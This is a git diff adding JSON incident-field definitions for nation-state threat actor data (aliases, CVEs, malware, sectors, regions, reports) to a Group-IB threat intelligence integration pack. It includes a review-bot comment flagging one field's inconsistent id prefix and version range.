+ "GIB Nation-State Cybercriminals Threat"
+ ],
+ "threshold": 72,
+ "type": "grid",
+ "unmapped": false,
+ "unsearchable": false,
+ "useAsKpi": false,
+ "version": -1,
+ "fromVersion": "6.10.0"
+}
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Expertises.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Expertises.json
new file mode 100644
index 000000000000..0bb4fa56fc8d
--- /dev/null
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Expertises.json
@@ -0,0 +1,34 @@
+{
+ "associatedToAll": false,
+ "associatedTypes": [
+ "GIB Nation-State Cybercriminals Threat Actor"
+ ],
+ "caseInsensitive": true,
+ "cliName": "gibnationstatecybercriminalsexpertises",
+ "closeForm": true,
+ "content": true,
+ "editForm": true,
+ "group": 0,
+ "hidden": false,
+ "id": "incident_gibnationstatecybercriminalsexpertises",
+ "isReadOnly": false,
+ "itemVersion": "1.4.2",
+ "locked": false,
+ "name": "GIB Nation-State Cybercriminals Expertises",
+ "neverSetAsRequired": false,
+ "openEnded": true,
+ "ownerOnly": false,
+ "required": false,
+ "sla": 0,
+ "system": false,
+ "systemAssociatedTypes": [
+ "GIB Nation-State Cybercriminals Threat Actor"
+ ],
+ "threshold": 72,
+ "type": "multiSelect",
+ "unmapped": false,
+ "unsearchable": false,
+ "useAsKpi": false,
+ "version": -1,
+ "fromVersion": "6.10.0"
+}
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Malware.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Malware.json
new file mode 100644
index 000000000000..165c4fc852ce
--- /dev/null
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Malware.json
@@ -0,0 +1,34 @@
+{
+ "associatedToAll": false,
+ "associatedTypes": [
+ "GIB Nation-State Cybercriminals Threat Actor"
+ ],
+ "caseInsensitive": true,
+ "cliName": "gibnationstatecybercriminalsmalware",
+ "closeForm": true,
+ "content": true,
+ "editForm": true,
+ "group": 0,
+ "hidden": false,
+ "id": "incident_gibnationstatecybercriminalsmalware",
+ "isReadOnly": false,
+ "itemVersion": "1.4.2",
+ "locked": false,
+ "name": "GIB Nation-State Cybercriminals Malware",
+ "neverSetAsRequired": false,
+ "openEnded": true,
+ "ownerOnly": false,
+ "required": false,
+ "sla": 0,
+ "system": false,
+ "systemAssociatedTypes": [
+ "GIB Nation-State Cybercriminals Threat Actor"
+ ],
+ "threshold": 72,
+ "type": "multiSelect",
+ "unmapped": false,
+ "unsearchable": false,
+ "useAsKpi": false,
+ "version": -1,
+ "fromVersion": "6.10.0"
+}
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Regions.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Regions.json
new file mode 100644
index 000000000000..c818949c6bf0
--- /dev/null
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Regions.json
@@ -0,0 +1,34 @@
+{
+ "associatedToAll": false,
+ "associatedTypes": [
+ "GIB Nation-State Cybercriminals Threat Actor"
+ ],
+ "caseInsensitive": true,
+ "cliName": "gibnationstatecybercriminalsregions",
+ "closeForm": true,
+ "content": true,
+ "editForm": true,
+ "group": 0,
+ "hidden": false,
+ "id": "incident_gibnationstatecybercriminalsregions",
+ "isReadOnly": false,
+ "itemVersion": "1.4.2",
+ "locked": false,
+ "name": "GIB Nation-State Cybercriminals Regions",
+ "neverSetAsRequired": false,
+ "openEnded": true,
+ "ownerOnly": false,
+ "required": false,
+ "sla": 0,
+ "system": false,
+ "systemAssociatedTypes": [
+ "GIB Nation-State Cybercriminals Threat Actor"
+ ],
+ "threshold": 72,
+ "type": "multiSelect",
+ "unmapped": false,
+ "unsearchable": false,
+ "useAsKpi": false,
+ "version": -1,
+ "fromVersion": "6.10.0"
+}
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Sectors.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Sectors.json
new file mode 100644
index 000000000000..053b1df0dbc9
--- /dev/null
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Sectors.json
@@ -0,0 +1,34 @@
+{
+ "associatedToAll": false,
+ "associatedTypes": [
+ "GIB Nation-State Cybercriminals Threat Actor"
+ ],
+ "caseInsensitive": true,
+ "cliName": "gibnationstatecybercriminalssectors",
+ "closeForm": true,
+ "content": true,
+ "editForm": true,
+ "group": 0,
+ "hidden": false,
+ "id": "incident_gibnationstatecybercriminalssectors",
+ "isReadOnly": false,
+ "itemVersion": "1.4.2",
+ "locked": false,
+ "name": "GIB Nation-State Cybercriminals Sectors",
+ "neverSetAsRequired": false,
+ "openEnded": true,
+ "ownerOnly": false,
+ "required": false,
+ "sla": 0,
+ "system": false,
+ "systemAssociatedTypes": [
+ "GIB Nation-State Cybercriminals Threat Actor"
+ ],
+ "threshold": 72,
+ "type": "multiSelect",
+ "unmapped": false,
+ "unsearchable": false,
+ "useAsKpi": false,
+ "version": -1,
+ "fromVersion": "6.10.0"
+}
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Threat_Actor_Aliases.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Threat_Actor_Aliases.json
new file mode 100644
index 000000000000..f2fa771462ff
--- /dev/null
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Threat_Actor_Aliases.json
@@ -0,0 +1,35 @@
+{
+ "associatedToAll": false,
+ "associatedTypes": [
+ "GIB Nation-State Cybercriminals Threat Actor"
+ ],
+ "caseInsensitive": true,
+ "cliName": "gibnationstatecybercriminalsthreatactoraliases",
+ "closeForm": true,
+ "content": true,
+ "editForm": true,
+ "group": 0,
+ "hidden": false,
+ "id": "gibnationstatecybercriminalsthreatactoraliases",
+ "isReadOnly": false,
+ "itemVersion": "1.4.2",
+ "locked": false,
+ "name": "GIB Nation-State Cybercriminals Threat Actor Aliases",
+ "neverSetAsRequired": false,
+ "openEnded": true,
+ "ownerOnly": false,
+ "required": false,
+ "sla": 0,
+ "system": false,
+ "systemAssociatedTypes": [
+ "GIB Nation-State Cybercriminals Threat Actor"
+ ],
+ "threshold": 72,
+ "type": "multiSelect",
+ "unmapped": false,
+ "unsearchable": false,
+ "useAsKpi": false,
+ "version": -1,
+ "fromVersion": "5.0.0",
+ "toVersion": "99.99.99"
+}
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Threat_Actor_CVE.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Threat_Actor_CVE.json
new file mode 100644
index 000000000000..643693e0c24e
--- /dev/null
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Threat_Actor_CVE.json
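Review bot: `"id": "gibnationstatecybercriminalsthreatactoraliases"` is the only field id in this commit without the `incident_` prefix that every sibling uses (`incident_<cliName>`), and this file also carries `"fromVersion": "5.0.0"` with `"toVersion": "99.99.99"` where all the other new fields use `"fromVersion": "6.10.0"`, so it would be offered to older servers than the rest of the pack content it belongs with. If neither difference is deliberate, change the id line to `"id": "incident_gibnationstatecybercriminalsthreatactoraliases",`, set `"fromVersion": "6.10.0"` and drop the `toVersion` line. I can't confirm from the diff alone whether the repository's content validator enforces the prefix, but a mismatched id is easy to miss once the pack is installed.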
@@ -0,0 +1,34 @@
+{
+ "associatedToAll": false,
+ "associatedTypes": [
+ "GIB Nation-State Cybercriminals Threat Actor"
+ ],
+ "caseInsensitive": true,
+ "cliName": "gibnationstatecybercriminalsthreatactorcve",
+ "closeForm": true,
+ "content": true,
+ "editForm": true,
+ "group": 0,
+ "hidden": false,
+ "id": "incident_gibnationstatecybercriminalsthreatactorcve",
+ "isReadOnly": false,
+ "itemVersion": "1.4.2",
+ "locked": false,
+ "name": "GIB Nation-State Cybercriminals Threat Actor CVE",
+ "neverSetAsRequired": false,
+ "openEnded": true,
+ "ownerOnly": false,
+ "required": false,
+ "sla": 0,
+ "system": false,
+ "systemAssociatedTypes": [
+ "GIB Nation-State Cybercriminals Threat Actor"
+ ],
+ "threshold": 72,
+ "type": "multiSelect",
+ "unmapped": false,
+ "unsearchable": false,
+ "useAsKpi": false,
+ "version": -1,
+ "fromVersion": "6.10.0"
+}
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Threat_Actor_Country.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Threat_Actor_Country.json
new file mode 100644
index 000000000000..408a702d428f
--- /dev/null
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Threat_Actor_Country.json
@@ -0,0 +1,34 @@
+{
+ "associatedToAll": false,
+ "associatedTypes": [
+ "GIB Nation-State Cybercriminals Threat Actor"
+ ],
+ "caseInsensitive": true,
+ "cliName": "gibnationstatecybercriminalsthreatactorcountry",
+ "closeForm": true,
+ "content": true,
+ "editForm": true,
+ "group": 0,
+ "hidden": false,
+ "id": "incident_gibnationstatecybercriminalsthreatactorcountry",
+ "isReadOnly": false,
+ "itemVersion": "1.4.2",
+ "locked": false,
+ "name": "GIB Nation-State Cybercriminals Threat Actor Country",
+ "neverSetAsRequired": false,
+ "openEnded": false,
+ "ownerOnly": false,
+ "required": false,
+ "sla": 0,
+ "system": false,
+ "systemAssociatedTypes": [
+ "GIB Nation-State Cybercriminals Threat Actor"
+ ],
+ "threshold": 72,
+ "type": "shortText",
+ "unmapped": false,
+ "unsearchable": false,
+ "useAsKpi": false,
+ "version": -1,
+ "fromVersion": "6.10.0"
+}
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Threat_Actor_Description.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Threat_Actor_Description.json
new file mode 100644
index 000000000000..f0b6659c206f
--- /dev/null
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Threat_Actor_Description.json
@@ -0,0 +1,34 @@
+{
+ "associatedToAll": false,
+ "associatedTypes": [
+ "GIB Nation-State Cybercriminals Threat Actor"
+ ],
+ "caseInsensitive": true,
+ "cliName": "gibnationstatecybercriminalsthreatactordescription",
+ "closeForm": true,
+ "content": true,
+ "editForm": true,
+ "group": 0,
+ "hidden": false,
+ "id": "incident_gibnationstatecybercriminalsthreatactordescription",
+ "isReadOnly": false,
+ "itemVersion": "1.4.2",
+ "locked": false,
+ "name": "GIB Nation-State Cybercriminals Threat Actor Description",
+ "neverSetAsRequired": false,
+ "openEnded": false,
+ "ownerOnly": false,
+ "required": false,
+ "sla": 0,
+ "system": false,
+ "systemAssociatedTypes": [
+ "GIB Nation-State Cybercriminals Threat Actor"
+ ],
+ "threshold": 72,
+ "type": "longText",
+ "unmapped": false,
+ "unsearchable": false,
+ "useAsKpi": false,
+ "version": -1,
+ "fromVersion": "6.10.0"
+}
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Threat_Actor_Goals.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Threat_Actor_Goals.json
new file mode 100644
index 000000000000..d43a61fb1911
--- /dev/null
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Threat_Actor_Goals.json
@@ -0,0 +1,34 @@
+{
+ "associatedToAll": false,
+ "associatedTypes": [
+ "GIB Nation-State Cybercriminals Threat Actor"
+ ],
+ "caseInsensitive": true,
+ "cliName": "gibnationstatecybercriminalsthreatactorgoals",
+ "closeForm": true,
+ "content": true,
+ "editForm": true,
+ "group": 0,
+ "hidden": false,
+ "id": "incident_gibnationstatecybercriminalsthreatactorgoals",
+ "isReadOnly": false,
+ "itemVersion": "1.4.2",
+ "locked": false,
+ "name": "GIB Nation-State Cybercriminals Threat Actor Goals",
+ "neverSetAsRequired": false,
+ "openEnded": true,
+ "ownerOnly": false,
+ "required": false,
+ "sla": 0,
+ "system": false,
+ "systemAssociatedTypes": [
+ "GIB Nation-State Cybercriminals Threat Actor"
+ ],
+ "threshold": 72,
+ "type": "multiSelect",
+ "unmapped": false,
+ "unsearchable": false,
+ "useAsKpi": false,
+ "version": -1,
+ "fromVersion": "6.10.0"
+}
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Threat_Actor_Labels.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Threat_Actor_Labels.json
new file mode 100644
index 000000000000..c7c84ef417cf
--- /dev/null
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Threat_Actor_Labels.json
@@ -0,0 +1,36 @@
+{
+ "associatedToAll": false,
+ "associatedTypes": [
+ "GIB Nation-State Cybercriminals Threat Actor",
+ "GIB Nation-State Cybercriminals Threat"
+ ],
+ "caseInsensitive": true,
+ "cliName": "gibnationstatecybercriminalsthreatactorlabels",
+ "closeForm": true,
+ "content": true,
+ "editForm": true,
+ "group": 0,
+ "hidden": false,
+ "id": "incident_gibnationstatecybercriminalsthreatactorlabels",
+ "isReadOnly": false,
+ "itemVersion": "1.4.2",
+ "locked": false,
+ "name": "GIB Nation-State Cybercriminals Threat Actor Labels",
+ "neverSetAsRequired": false,
+ "openEnded": true,
+ "ownerOnly": false,
+ "required": false,
+ "sla": 0,
+ "system": false,
+ "systemAssociatedTypes": [
+ "GIB Nation-State Cybercriminals Threat Actor",
+ "GIB Nation-State Cybercriminals Threat"
+ ],
+ "threshold": 72,
+ "type": "multiSelect",
+ "unmapped": false,
+ "unsearchable": false,
+ "useAsKpi": false,
+ "version": -1,
+ "fromVersion": "6.10.0"
+}
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Threat_Actor_Reports_Table.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Threat_Actor_Reports_Table.json
new file mode 100644
index 000000000000..edbbc63cbb7f
--- /dev/null
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Threat_Actor_Reports_Table.json
@@ -0,0 +1,80 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Nation-State Cybercriminals Threat Actor" + ], + "caseInsensitive": true, + "cliName": "gibnationstatecybercriminalsthreatactorreportstable", + "closeForm": true, + "columns": [ + { + "displayName": "ID", + "fieldCalcScript": "", + "isDefault": true, + "isReadOnly": false, + "key": "id", + "orgType": "shortText", + "required": false, + "script": "", + "selectValues": null, + "type": "shortText", + "width": 150 + }, + { + "displayName": "Name", + "fieldCalcScript": "", + "isDefault": true, + "isReadOnly": false, + "key": "name", + "orgType": "shortText", + "required": false, + "script": "", + "selectValues": null, + "type": "shortText", + "width": 150 + }, + { + "displayName": "Date Published", + "fieldCalcScript": "", + "isDefault": true, + "isReadOnly": false, + "key": "datepublished", + "orgType": "date", + "required": false, + "script": "", + "selectValues": null, + "type": "date", + "width": 150 + } + ], + "content": true, + "defaultRows": [ + {} + ], + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibnationstatecybercriminalsthreatactorreportstable", + "isReadOnly": false, + "locked": false, + "name": "GIB Nation-State Cybercriminals Threat Actor Reports Table", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "propagationLabels": [ + "all" + ], + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Nation-State Cybercriminals Threat Actor" + ], + "threshold": 72, + "type": "grid", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file 
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Threat_Actor_Roles.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Threat_Actor_Roles.json new file mode 100644 index 000000000000..b92f2e21eb2e --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Threat_Actor_Roles.json @@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Nation-State Cybercriminals Threat Actor" + ], + "caseInsensitive": true, + "cliName": "gibnationstatecybercriminalsthreatactorroles", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibnationstatecybercriminalsthreatactorroles", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Nation-State Cybercriminals Threat Actor Roles", + "neverSetAsRequired": false, + "openEnded": true, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Nation-State Cybercriminals Threat Actor" + ], + "threshold": 72, + "type": "multiSelect", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Threat_Countries.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Threat_Countries.json new file mode 100644 index 000000000000..42581c8aed4c --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Threat_Countries.json 
@@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Nation-State Cybercriminals Threat" + ], + "caseInsensitive": true, + "cliName": "gibnationstatecybercriminalsthreatcountries", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibnationstatecybercriminalsthreatcountries", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Nation-State Cybercriminals Threat Countries", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Nation-State Cybercriminals Threat" + ], + "threshold": 72, + "type": "shortText", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Threat_Description.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Threat_Description.json new file mode 100644 index 000000000000..0dc9e6a54f7f --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Threat_Description.json 
@@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Nation-State Cybercriminals Threat" + ], + "caseInsensitive": true, + "cliName": "gibnationstatecybercriminalsthreatdescription", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibnationstatecybercriminalsthreatdescription", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Nation-State Cybercriminals Threat Description", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Nation-State Cybercriminals Threat" + ], + "threshold": 72, + "type": "longText", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Threat_Expertises.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Threat_Expertises.json new file mode 100644 index 000000000000..a9f752f1798b --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Threat_Expertises.json 
@@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Nation-State Cybercriminals Threat" + ], + "caseInsensitive": true, + "cliName": "gibnationstatecybercriminalsthreatexpertises", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibnationstatecybercriminalsthreatexpertises", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Nation-State Cybercriminals Threat Expertises", + "neverSetAsRequired": false, + "openEnded": true, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Nation-State Cybercriminals Threat" + ], + "threshold": 72, + "type": "multiSelect", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Threat_Langs.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Threat_Langs.json new file mode 100644 index 000000000000..a327fb9f87b2 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Threat_Langs.json 
@@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Nation-State Cybercriminals Threat" + ], + "caseInsensitive": true, + "cliName": "gibnationstatecybercriminalsthreatlangs", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibnationstatecybercriminalsthreatlangs", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Nation-State Cybercriminals Threat Langs", + "neverSetAsRequired": false, + "openEnded": true, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Nation-State Cybercriminals Threat" + ], + "threshold": 72, + "type": "multiSelect", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Threat_Regions.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Threat_Regions.json new file mode 100644 index 000000000000..c87ca1a96661 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Threat_Regions.json 
@@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Nation-State Cybercriminals Threat" + ], + "caseInsensitive": true, + "cliName": "gibnationstatecybercriminalsthreatregions", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibnationstatecybercriminalsthreatregions", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Nation-State Cybercriminals Threat Regions", + "neverSetAsRequired": false, + "openEnded": true, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Nation-State Cybercriminals Threat" + ], + "threshold": 72, + "type": "multiSelect", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Threat_Report_Number.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Threat_Report_Number.json new file mode 100644 index 000000000000..ce7543bfcde3 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Threat_Report_Number.json 
@@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Nation-State Cybercriminals Threat" + ], + "caseInsensitive": true, + "cliName": "gibnationstatecybercriminalsthreatreportnumber", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibnationstatecybercriminalsthreatreportnumber", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Nation-State Cybercriminals Threat Report Number", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Nation-State Cybercriminals Threat" + ], + "threshold": 72, + "type": "shortText", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Threat_Sectors.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Threat_Sectors.json new file mode 100644 index 000000000000..6170f6243983 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Threat_Sectors.json 
@@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Nation-State Cybercriminals Threat" + ], + "caseInsensitive": true, + "cliName": "gibnationstatecybercriminalsthreatsectors", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibnationstatecybercriminalsthreatsectors", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Nation-State Cybercriminals Threat Sectors", + "neverSetAsRequired": false, + "openEnded": true, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Nation-State Cybercriminals Threat" + ], + "threshold": 72, + "type": "multiSelect", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Threat_Title.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Threat_Title.json new file mode 100644 index 000000000000..eb4f2bc7d8dc --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Threat_Title.json 
@@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Nation-State Cybercriminals Threat" + ], + "caseInsensitive": true, + "cliName": "gibnationstatecybercriminalsthreattitle", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibnationstatecybercriminalsthreattitle", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Nation-State Cybercriminals Threat Title", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Nation-State Cybercriminals Threat" + ], + "threshold": 72, + "type": "shortText", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_OSI_Git_Repository_Files_Table.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_OSI_Git_Repository_Files_Table.json new file mode 100644 index 000000000000..8d7c69d2b5ac --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_OSI_Git_Repository_Files_Table.json 
